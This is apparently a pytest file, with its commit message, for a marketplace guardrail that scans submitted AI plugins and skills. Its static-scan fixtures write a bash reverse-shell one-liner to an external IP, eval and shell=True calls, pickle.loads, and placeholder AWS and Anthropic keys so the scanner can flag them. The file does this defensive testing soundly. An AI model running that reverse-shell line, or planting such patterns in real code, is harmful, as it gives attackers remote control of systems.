agnes-the-ai-analyst/tests/test_store_guardrails_inline.py
Vojtech fb6e930bc9
feat(store-guardrails): per-component description quality + plain-language UX (#276)
* feat(store-guardrails): enforce per-component description quality

Two-tier hard guardrail on flea-market submissions. Empty / placeholder /
single-word descriptions now block before any LLM call; vague-but-passes-
floor descriptions block on the substantive LLM review layer.

Tier 1 — inline mechanical check (src/store_guardrails/content_check.py).
Walks the baked plugin tree, evaluates each component (plugin manifest,
agents, skills, commands) plus the submission-level form description
against a 60-char / 25-char (commands) / 5-distinct-word / 200-char-body
floor with a placeholder denylist (TODO, TBD, {{var}}, etc.). Floors
calibrated against real ecosystem norms: Claude / superpowers /
compound-engineering skill packs cluster 150–220 chars, npm / Docker /
VS Code at 100–120. InlineResult.passed now ANDs in content.status.

Tier 2 — LLM review extension (prompts.py + llm_review.py). System
prompt gains a content-quality criterion; REVIEW_JSON_SCHEMA carries a
content_quality {verdict, issues[]} object alongside the existing
security findings. is_safe() requires content_quality.verdict == 'pass'.
Single LLM call covers both dimensions. MAX_RESPONSE_TOKENS bumped
2000 → 2500 for the extra payload. Verdicts missing content_quality
treated as pass (backwards compat with already-recorded rows).

Submitter UX:
- /store/new wizard now carries a "Before you upload — what passes
  review" collapsible disclosure on both step 1 and step 2 with the
  bar + patterns that work. Live char counter on the description
  field. Per-component preview table (green/red dots from the new
  summarize_for_preview helper) renders after the ZIP /preview round
  trip, scoping each finding to its file.
- New /store/examples page with rejected/passes pairs for skill /
  agent / plugin / command plus a "Why these limits" research table.
  Anchored sections (#skill / #agent / #plugin / #command) so the
  rejection banner can deep-link by component_type.
- Quarantine banner _content_findings.html groups findings by file
  (one "See <type> example ↗" per component, not per field) and
  translates field codes (frontmatter.description / body / etc.) to
  plain-English labels. _content_howto_fix.html surfaces a static
  "Re-upload as new version" + "See examples" action row beneath any
  content failure on the entity detail page.
- _parse_frontmatter moved to src/store_guardrails/_frontmatter.py so
  the new check module shares the parser without inverting the
  app → src dependency direction.

Tests:
- New tests/test_store_guardrails_content.py (29 cases) covering
  every failure code per component type plus submission-level checks
  and the summarize_components / summarize_for_preview helpers.
- Extended test_store_guardrails_inline.py for the new
  InlineResult.content field + aggregate behaviour.
- Extended test_store_guardrails_llm.py for the new
  content_quality verdict pathways (fail blocks, missing field passes).
- Backfilled fixture descriptions across test_store_api.py,
  test_store_entity_versions.py, test_store_put_atomic.py,
  test_admin_store_submissions.py, test_marketplace_api.py,
  test_marketplace_v32_endpoints.py so existing happy-path tests
  clear the new 60-char floor.

* fix(content-guardrail): align agents walker with preview + drop import-time .format()

Two cleanups from the takeover review on #276 (vr/guardrails-content).

1) `_iter_components` for agents now skips files lacking frontmatter
   (no `name` AND no `description`). Pre-fix the walker greedily
   evaluated every `*.md` under `agents/` — `agents/README.md` and
   helper docs got flagged as "frontmatter.description empty"
   rejections. Worse: `summarize_for_preview` for `type=agent` ALREADY
   filters the same shape, so the upload preview gave a green dot
   while the post-bake check gave a red rejection on submit. Two new
   regression tests in TestAgentsWalkerSkipsNonAgentFiles pin both
   shapes (README + _NOTES.md) so the preview/check parity stays
   aligned.

2) `body_too_short` hints now use the same runtime-kwarg substitution
   pattern as every other hint in the table. Pre-fix the skill +
   agent body_too_short hints called `.format(min_chars=_MIN_BODY_CHARS)`
   at module-load time, but the call site `_hint_for(type_,
   "body_too_short")` didn't pass `min_chars=`, so the format() was
   just baking the constant at import. Cosmetic inconsistency; pass
   `min_chars=_MIN_BODY_CHARS` at the call site instead and let
   `_hint_for` do the substitution like it does for `too_short`.

Verified end-to-end:
- New TestAgentsWalkerSkipsNonAgentFiles cases fail on the unfixed
  walker (verified by reverting to the pre-fix file and re-running);
  pass cleanly after the fix.
- Full content-guardrail suite: 25/25 (23 existing + 2 new).
- Full pytest: 4189 passed, 25 skipped.

* release: 0.53.5 — content guardrail (flea-market submitter UX) + catalog ENTITY column + BQ hint dispatch

Bundles three threads landed in [Unreleased]:
- Vojta's flea-market content guardrail (two-tier mechanical + LLM)
- Zdeněk's `agnes catalog` ENTITY column replacement for FLAVOR
- Zdeněk's `/api/query` remote_estimate_failed hint dispatch fix

Plus the takeover hygiene from #276 review (agents walker preview/check
parity + body_too_short hint runtime kwarg consistency) and the
backslash-escape fix follow-up to v0.53.4 #275.

No DB migration; no API change. Patch upgrade lands transparently.
Upload form's new "Before you upload" disclosure + per-component preview
table appear on the next dev-VM auto-pull. Quarantine banner now groups
findings by file with "See <type> example ↗" deep-links to the new
/store/examples reference page.

---------

Co-authored-by: ZdenekSrotyr <zdenek.srotyr@keboola.com>
2026-05-12 21:48:27 +02:00

285 lines
13 KiB
Python

"""Inline guardrail tests — the deterministic pre-LLM checks.
These tests pin the failure-mode catalogue: every regex/structural rule
exercised against a synthetic plugin tree, so adding or weakening a rule
is a visible diff in the test fixtures, not a silent regression.
"""
from __future__ import annotations
import shutil
import tempfile
from pathlib import Path
import pytest
from src.store_guardrails import run_inline_checks
from src.store_guardrails.runner import InlineResult
# ---------------------------------------------------------------------------
# Fixtures
# ---------------------------------------------------------------------------
@pytest.fixture
def plugin_dir():
d = Path(tempfile.mkdtemp(prefix="agnes_guardrail_test_"))
yield d
shutil.rmtree(d, ignore_errors=True)
_OK_DESC = "Use when verifying inline guardrail behavior across the test matrix"
def _write_skill_md(plugin_dir: Path, body: str = "Body that's long enough to satisfy the doc-length quality threshold." * 5, *, description: str = _OK_DESC) -> None:
(plugin_dir / "skills").mkdir(exist_ok=True)
(plugin_dir / "skills" / "test-skill").mkdir(exist_ok=True)
(plugin_dir / "skills" / "test-skill" / "SKILL.md").write_text(
f"---\nname: test-skill\ndescription: {description}\n---\n\n{body}\n",
encoding="utf-8",
)
# ---------------------------------------------------------------------------
# Manifest checks
# ---------------------------------------------------------------------------
class TestManifestCheck:
def test_skill_with_valid_skill_md_passes(self, plugin_dir):
_write_skill_md(plugin_dir)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when verifying clean-skill happy path passes the inline gate")
assert r.manifest["status"] == "pass"
assert r.passed
def test_skill_missing_skill_md_fails(self, plugin_dir):
# No SKILL.md anywhere.
(plugin_dir / "README.md").write_text("nope" * 50)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when SKILL.md is missing so manifest check fails clearly")
assert r.manifest["status"] == "fail"
assert "missing_skill_md" in r.manifest["issues"]
assert not r.passed
def test_plugin_missing_manifest_fails(self, plugin_dir):
(plugin_dir / "README.md").write_text("nope" * 100)
r = run_inline_checks(plugin_dir, type_="plugin", description="Use when plugin.json manifest is missing entirely from the bundle")
assert r.manifest["status"] == "fail"
assert "missing_plugin_manifest" in r.manifest["issues"]
assert not r.passed
def test_plugin_invalid_json_fails(self, plugin_dir):
(plugin_dir / ".claude-plugin").mkdir()
(plugin_dir / ".claude-plugin" / "plugin.json").write_text("{ this is not json")
(plugin_dir / "README.md").write_text("hi" * 200)
r = run_inline_checks(plugin_dir, type_="plugin", description="Use when plugin.json contains malformed JSON in the manifest")
assert r.manifest["status"] == "fail"
assert "plugin_manifest_invalid_json" in r.manifest["issues"]
def test_plugin_invalid_name_fails(self, plugin_dir):
(plugin_dir / ".claude-plugin").mkdir()
(plugin_dir / ".claude-plugin" / "plugin.json").write_text(
'{"name": "spaces are bad", "version": "0.1.0"}'
)
(plugin_dir / "README.md").write_text("hi" * 200)
r = run_inline_checks(plugin_dir, type_="plugin", description="Use when plugin.json carries a name with characters we forbid")
assert "plugin_manifest_invalid_name" in r.manifest["issues"]
def test_unsupported_type_fails(self, plugin_dir):
_write_skill_md(plugin_dir)
r = run_inline_checks(plugin_dir, type_="bogus", description="x" * 50)
assert r.manifest["status"] == "fail"
# ---------------------------------------------------------------------------
# Static security scan
# ---------------------------------------------------------------------------
class TestStaticScan:
def test_python_eval_flagged(self, plugin_dir):
_write_skill_md(plugin_dir)
(plugin_dir / "run.py").write_text(
"user_input = input()\nresult = eval(user_input)\n"
)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when the bundle contains python eval over untrusted input")
assert not r.passed
cats = {f["category"] for f in r.static_security["findings"]}
assert "code_exec" in cats
def test_bash_eval_flagged(self, plugin_dir):
_write_skill_md(plugin_dir)
(plugin_dir / "run.sh").write_text("#!/bin/sh\neval $1\n")
r = run_inline_checks(plugin_dir, type_="skill", description="Use when the bundle contains a bash eval over runtime arguments")
assert not r.passed
def test_subprocess_shell_true_flagged(self, plugin_dir):
_write_skill_md(plugin_dir)
(plugin_dir / "wrap.py").write_text(
"import subprocess\nsubprocess.run(cmd, shell=True)\n"
)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when the bundle invokes subprocess.run with shell true")
assert not r.passed
def test_pickle_loads_flagged(self, plugin_dir):
_write_skill_md(plugin_dir)
(plugin_dir / "loader.py").write_text(
"import pickle\nobj = pickle.loads(blob)\n"
)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when the bundle deserializes pickle blobs from untrusted input")
assert not r.passed
def test_aws_key_literal_flagged(self, plugin_dir):
_write_skill_md(plugin_dir)
(plugin_dir / "creds.py").write_text(
'AWS_KEY = "AKIAIOSFODNN7EXAMPLE"\n'
)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when the bundle hardcodes an AWS access key literal in source")
cats = {f["category"] for f in r.static_security["findings"]}
assert "secret_leak" in cats
def test_anthropic_key_literal_flagged(self, plugin_dir):
_write_skill_md(plugin_dir)
(plugin_dir / "creds.py").write_text(
'KEY = "sk-1234567890abcdef1234567890abcdef12345678"\n'
)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when the bundle hardcodes an Anthropic api key literal in source")
cats = {f["category"] for f in r.static_security["findings"]}
assert "secret_leak" in cats
def test_reverse_shell_flagged(self, plugin_dir):
_write_skill_md(plugin_dir)
(plugin_dir / "init.sh").write_text(
"#!/bin/sh\nbash -i >& /dev/tcp/8.8.8.8/4444 0>&1\n"
)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when the bundle opens a reverse shell to an external host")
cats = {f["category"] for f in r.static_security["findings"]}
assert "reverse_shell" in cats
def test_template_aware_eval_inside_placeholder_not_flagged(self, plugin_dir):
"""Eval-like text inside ``{{var}}`` is documentation, not exec."""
_write_skill_md(plugin_dir)
# README mentioning what placeholders look like — must NOT trip
# the eval rule.
(plugin_dir / "skills" / "test-skill" / "EXAMPLE.md").write_text(
"Use the placeholder like this: {{eval(USER_INPUT)}}\n" * 5
)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when the bundle README documents placeholders that look like eval")
# No code_exec finding from the templated text.
cats = {f["category"] for f in r.static_security["findings"]}
assert "code_exec" not in cats
def test_clean_skill_passes(self, plugin_dir):
_write_skill_md(plugin_dir)
(plugin_dir / "skills" / "test-skill" / "helper.py").write_text(
"def hello():\n return 'world'\n"
)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when the bundle is entirely clean and should pass every check")
assert r.passed
assert r.static_security["status"] == "pass"
def test_eval_in_markdown_not_flagged(self, plugin_dir):
"""#6 — documentation files (.md, .txt, .rst) skip static scan
so prose discussing 'eval' / 'exec' doesn't trip false positives.
Same string in a .py file MUST still flag (locked in
test_python_eval_flagged)."""
_write_skill_md(plugin_dir)
# README that legitimately discusses eval — must NOT flag.
(plugin_dir / "skills" / "test-skill" / "NOTES.md").write_text(
"# Notes\n\n"
"Avoid `eval(user_input)` in production code — see OWASP.\n"
"Same applies to `exec(arbitrary_text)`.\n"
)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when documentation prose mentions eval and exec inside markdown")
cats = {f["category"] for f in r.static_security["findings"]}
assert "code_exec" not in cats, (
"static scan flagged 'eval' in a .md file — docs should skip"
)
assert r.passed
# ---------------------------------------------------------------------------
# Quality + templating
# ---------------------------------------------------------------------------
class TestQualityCheck:
def test_template_recommendation_when_zero_placeholders(self, plugin_dir):
_write_skill_md(plugin_dir, body="Plain text without parameterization." * 10)
r = run_inline_checks(
plugin_dir, type_="skill",
description="Plain skill, no template hooks at all here",
)
assert r.quality["template_placeholders"] == 0
assert r.quality["template_recommendation"] is not None
def test_no_recommendation_when_placeholders_present(self, plugin_dir):
_write_skill_md(
plugin_dir,
body="Sends results to {{SLACK_CHANNEL}} for {{TEAM_NAME}}." * 5,
)
r = run_inline_checks(
plugin_dir, type_="skill",
description="Templated skill with parameterization",
)
assert r.quality["template_placeholders"] >= 2
assert r.quality["template_recommendation"] is None
def test_short_description_blocks_via_content_check(self, plugin_dir):
"""A too-short submission description trips BOTH the soft quality
warn (≤ 20 chars) AND the hard content check (≤ 30 chars). Quality
stays advisory; content blocks publication."""
_write_skill_md(plugin_dir)
r = run_inline_checks(plugin_dir, type_="skill", description="x")
assert r.quality["status"] == "warn"
assert "description_too_short" in r.quality["issues"]
# Content guardrail blocks — short submission description is a
# hard fail under the per-component bar.
assert r.content["status"] == "fail"
assert not r.passed
def test_lorem_ipsum_warns(self, plugin_dir):
(plugin_dir / "skills").mkdir()
(plugin_dir / "skills" / "x").mkdir()
(plugin_dir / "skills" / "x" / "SKILL.md").write_text(
"---\nname: x\n---\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit.\n" * 5
)
r = run_inline_checks(
plugin_dir, type_="skill", description="Use when the bundle body contains lorem ipsum filler placeholder copy",
)
assert any("lorem_ipsum" in i for i in r.quality["issues"])
# ---------------------------------------------------------------------------
# Aggregation
# ---------------------------------------------------------------------------
class TestInlineResult:
def test_to_response_dict_shape(self, plugin_dir):
_write_skill_md(plugin_dir)
r = run_inline_checks(plugin_dir, type_="skill", description="Use when probing the InlineResult response-dict shape for callers")
d = r.to_response_dict()
assert set(d.keys()) == {"manifest", "static_security", "content", "quality"}
def test_passed_ignores_soft_quality_warn(self, plugin_dir):
"""Quality 'warn' must not flip InlineResult.passed to False — slop
signals are advisory. Use a strong submission description so the
hard content check doesn't bite: we're isolating the soft-quality
path here."""
(plugin_dir / "skills").mkdir()
(plugin_dir / "skills" / "x").mkdir()
(plugin_dir / "skills" / "x" / "SKILL.md").write_text(
"---\nname: x\ndescription: Use when verifying slop warnings stay advisory across the pipeline\n---\n\n"
"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\n" * 10,
encoding="utf-8",
)
r = run_inline_checks(
plugin_dir, type_="skill",
description="Use when verifying slop warnings stay advisory across the pipeline",
)
assert r.quality["status"] == "warn"
assert r.manifest["status"] == "pass"
assert r.static_security["status"] == "pass"
assert r.content["status"] == "pass"
assert r.passed